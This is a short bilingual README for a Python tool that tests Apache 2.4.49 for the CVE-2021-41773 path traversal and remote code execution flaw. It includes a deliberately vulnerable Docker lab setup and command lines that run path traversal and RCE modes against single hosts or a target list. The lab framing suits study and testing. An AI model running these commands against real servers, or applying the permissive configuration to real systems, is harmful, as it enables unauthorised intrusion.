
cve-2021-41773.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49
cve-2021-41773.py एक पायथन स्क्रिप्ट है जो Apache 2.4.49 में पथ ट्रैवर्सल या रिमोट कोड निष्पादन भेद्यता खोजने में मदद करेगी। CVE-2021-41773 पर हाथ आजमाने के लिए Docker का एक संवेदनशील उदाहरण प्रदान किया गया है।
यदि CGI-BIN सक्षम है तो हम रिमोट कोड निष्पादन कर सकते हैं लेकिन पथ ट्रैवर्सल नहीं, इसलिए पथ ट्रैवर्सल भेद्यता की जांच के लिए httpd.conf में उपनाम अनुभाग के अंतर्गत "icons" निर्देशिका जोड़ी गई है।
1. Enable CGI-BIN
2. Add "icons" directory in Alias section
3. <Directory>Require all granted</Directory>
$ docker build -t cve-2021-41773 .
$ docker run -it cve-2021-41773
$ python3 cve-2021-41773.py -u http://172.17.0.2
$ python3 cve-2021-41773.py -u http://172.17.0.2 -pt
$ python3 cve-2021-41773.py -u http://172.17.0.2 -rce
$ python3 cve-2021-41773.py -l list.txt
$ python3 cve-2021-41773.py -l list.txt -pt
$ python3 cve-2021-41773.py -l list.txt -rce
अधिक जानकारी यहाँ पाई जा सकती है।